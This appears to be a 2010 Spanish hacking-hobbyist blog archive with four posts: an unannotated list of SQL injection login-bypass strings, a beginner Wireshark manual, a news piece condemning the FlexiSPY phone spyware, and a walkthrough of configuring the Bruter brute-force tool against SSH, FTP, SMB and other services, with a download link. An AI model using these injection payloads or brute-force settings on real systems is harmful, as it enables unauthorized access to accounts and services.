jueves, 29 de julio de 2010

string sql

string sql: "
admin’–
‘ or 0=0 –
” or 0=0 –
or 0=0 –
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’='x
” or “x”=”x
‘) or (‘x’='x
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or a=a–
” or “a”=”a
‘) or (‘a’='a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 –
hi’ or 1=1 –
hi’ or ‘a’='a
hi’) or (‘a’='a
hi”) or (“a”=”a
"

jueves, 22 de julio de 2010

Manual Wireshark

Manual Wireshark: "

Wireshark, es un analizador de protocolos utilizado para realizar análisis y solucionar problemas en redes de comunicaciones para desarrollo de software y protocolos, y como una herramienta didáctica para educación.
Su función es similar a la de *tcpdump, pero añade una interfaz gráfica y opciones de organización y filtrado de información. Así, permite ver todo el tráfico que pasa a través de una red estableciendo la configuración en modo promiscuo.
En la siguiente explicación veremos como funciona más detalladamente.

-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·-·--·-·-·-·-

Manual Wireshark

1.-Cuando abrimos por primera vez el programa se muestra y detalla la interfaz de usuario y como se aplican las principales funciones de WireShark (Capturar, Desplegar y Filtrar paquetes).


File -> contiene las funciones para manipular archivos y para cerrar la aplicación Wireshark.
Edit -> este se puede aplicar funciones a los paquetes, por ejemplo, buscar un paquetes especifico, aplicar una marca al paquete y configurar la interfaz de usuario.
View -> permite configurar el despliegue del paquete capturado.
Go -> Desde aquí permiten ...
Capture -> para iniciar y detener la captura de paquetes.
Analyze -> desde analyze podemos manipular los filtros, habilitar o deshabilitar protocolos, flujos de paquetes, etc.
Statistics -> podemos definir u obtener las estadísticas del trafico capturado.
Help -> menú de ayuda.


A continuación empezaremos con la aplicación más sencilla que podemos utilizar en el programa.


Capturar paquetes IP

WireShark cuenta con tres maneras para iniciar la captura de los paquetes:

·Haciendo doble clic en se despliega una ventana donde se listan las interfaces locales disponibles para iniciar la captura de paquetes.


Tres botones se visualizan por cada interfaz

Start -> para iniciar
Options -> para configurar
Details -> proporciona información adicional de la tarjeta como su descripción, estadísticas, etc.

Otra opcion es Otra seleccionar el icono en la barra de herramientas, y abrimos la siguiente ventana donde se muestra opciones de configuración para la tarjeta de red.


O por ultimo en el caso que se haya predefinido las opciones de la tarjeta, haciendo clic en se inicia la captura de paquetes inmediata.

Capture/start


Cuando pulsamos a start nos muestra esta pantalla.


La información se organiza de la siguiente forma.
primera columna[N.o]-> muestra el número de paquetes que enviamos o recibimos.
Segunda columna[Time] ->s el tiempo que tarda en transmitirse el paquete de datos.
Tercera columna[Source]-> la ip origen.
Cuarta columna[Destination]-> la ip destino.
Quinta columna[Protocol]-> El protocolo que utiliza en esa transmisión (especificaciones pag..)
Sexta columna[info.]-> Nos muestra una pequeña información sobre el paquete de datos.
En la parte que he señalado en azul-> Contiene el protocolo y los campos correspondientes del paquete previamente seleccionado en el panel de paquetes capturados[Gris]. Seleccionando una de estas líneas con el botón secundario del Mouse se tiene opciones para ser aplicadas según las necesidades.


En la parte que he señalado en amarillo-> En este panel se despliega el contenido del paquete en formato hexadecimal.


Wireshark tiene otra funcion importante y es la campura de paquetes pero con filtrado.

Filtrar paquetes IP.

Para guardar o abrir un filtro existente se debe seleccionar Display Filter en el menú Analyze o Capture Filter que se encuentra en el menú Capture.

Capture/filter


Para definir un filtro pulsamos un nombre de la lista que tenemos y solo nos filtrara aquello que allamos seleccionado

Analizando un paquete.

El paquete que voy a analizar va a ser un envio de trafico Ping.
cmd-> ping 192.168.2.21 [cualquier ip]


En la captura vemos que al hacer ping tenemos dos clases de protocolos diferentes: ARP y ICMP.
ARP -> para poder llegar al nodo correspondiente se necesita que la tabla ARP se rellene y mas tarde el ping se ara correctamente.
ICMP -> en lo que vemos que corresponde al protocolo ICMP es los ping que se han hecho a un nodo.
Mediante ping comprobamos la correcta conectividad entre equipos. Observamos que en la columna de info pone request y replay. La línea de request la enviamos desde nuestro nodo y replay es la contestación a nuestra trama.

"

miércoles, 14 de julio de 2010

[Noticia] Troyano para espiar llamadas y SMS │ FlexiSPY

[Noticia] Troyano para espiar llamadas y SMS │ FlexiSPY: "
Troyano para espiar llamadas y SMS de móviles Symbian

Recientemente, el laboratorio de F-Secure anunció la existencia del primer troyano específico para Symbian OS, el sistema operativo que utiliza el grueso de teléfonos Nokia, si bien hay modelos de Motorola, Panasonic, Sony Ericsson, Psion y, recientemente, Siemens, que también operan con versiones del sistema operativo del consorcio Symbian.

El troyano se llama FlexiSpy.A, y tiene la capacidad de recoger información sobre las llamadas y SMS enviados por los usuarios, para luego ser trasladados a un servidor controlado por los atacantes.

Es llamativo el hecho de que este troyano ha sido creado por una compañía con fines comerciales. Los desarrolladores argumentan que es una herramienta útil para poder averiguar si nuestra pareja es fiel o no, registrando sus comunicaciones salientes. Con Flexispy es posible saber a quién llama o mensajea nuestra pareja, según los prospectos comerciales que distribuye la compañía que ha desarrollado el 'invento'.


Realmente escabroso, no sólo por la violación de la privacidad que esto implica, sino porque esto faculta no sólo a espiar a nuestra pareja, vecino o amigo, sino dar pie a espionajes masivos mediante por ejemplo, diseminación por Bluetooth, obteniendo información sensible de muchos usuarios, habida cuenta del descontrol existente con el Bluetooth en la actualidad.

F-Secure tacha a la aplicación como malware en su sistema antivirus para móviles. Me parece sin duda una política acertada. A ver si con un poco de suerte, en alguna jurisprudencia donde espiar las comunicaciones sea ilegal, como por ejemplo la española, le tiran de las orejas a los lumbreras que han inventado este 'programa comercial' para 'controlar a la pareja'.

Patético.

PD: Acabo de ver en la web de F-Secure que el troyano no sólo monitoriza llamadas y SMS, sino que captura también el IMEI, horas de cliente y servidor, duración y nombre del contacto en el teléfono de la víctima.
"

jueves, 1 de julio de 2010

Bruter 1.0 - Fuerza bruta por varios protocolos

Bruter 1.0 - Fuerza bruta por varios protocolos: "Se puede correr tanto en Windows como en GNU/Linux con wine.

De primera mano este es su aspecto:


En el menú podemos apreciar | File | Setting | Log | Help |
- File : Guardar los resultados en un archivo de texto y salir simplemente.
- Setting : Cargar la configuración por defecto, establecer la configuración actual como por defecto, cargar configuración y guardar configuración.
- Log : Desde la configuración del log podemos activarlo o desactivarlo con varias informaciones:
- Debug
- Information
- Notice
- Warning
- Error
- Critical
- Enable packet logging

- Help : El About del programa.

Las configuraciones del programa muestra:
- Opciones de conexión:
- Target : ip/host al que va dirigido el ataque, también podemos configurar un proxy mediante HTTP, SOCKS4 y SOCKS5, y si requiere autentificación, la especificamos.
- Protocol : El protocolo al que va dirigido (FTP, HTTP basico-formulario, IMAP, MSSQL, MySQL, POP3, SMB, SMTP, SNMP, SSH2, Telnet y VNC).
- Port : Puerto, con la opción de habilitar SSL cuando sea posible.
- Opciones de usuario:
- User : El user que vamos a utilizar, podemos escribir un solo user o podemos utilizar un archivo .txt como diccionario con varios users posibles.
- Modos de contraseña:
- Combo : El combo es utilizado con un delimitador (:, espacio o tabulado) en el que ván el user y la password de esta manera: admin:password o en vez de ':' un espacio o una tabulación. El len es desde cuantos caracteres hasta cuantos van a ser posibles, esto descarta los que no estén en el rango que establezcas.
- Dictionary : El uso de un diccionario .txt con las contraseñas posibles, podemos añadir ala configuración que automáticamente el dicionario ponga use aparte de las combinaciones que tengamos, metamorfosee las password poniendolas en minuscula, mayuscula, mayuscula la primera letra, invierta los caracteres o la duplique, o todo a la vez, multiplicando las posibilidades de acertar en un 600%, donde también podemos añadir len para coger un rango y desechar las que no estén en ese rango que establezcamos.
- Brute force : El método que más me gusta, pero más lento, nos dá la opción de elegir entre una serie de caracteres con los que hacer el ataque o podemos elegir que caracteres queremos que use.
- Opciones misceláneas:
- Connections : El número de conexiones activa que queremos tener al mismo tiempo corriendo.
- Max retry : Máximos reintentos de conexión.
- Time out : El tiempo límite para cada re/intento de conexión.
- Wait for retry : El tiempo que va a esperar para realizar otro reintento de conexión.
- Max attempt/Conection : Número máximo de intentos/conexiones a la vez.
- Casilla-Stop when found one : Si se activa, cuando el programa encuentre el user y la password dejará de testear y mostrará el resultado.
Luego, digamos en la consola de información tenemos:
- Result: Donde aparecen los resultados, cuando obtenemos el usuario correcto con su respectiva contraseña.
- Testing: Donde podemos apreciar que se está realizando en ese instante.
- Message: El log donde aparecen errores y más informaciones relevantes.

DESCARGAR

Creditos: d33k40
Post original
"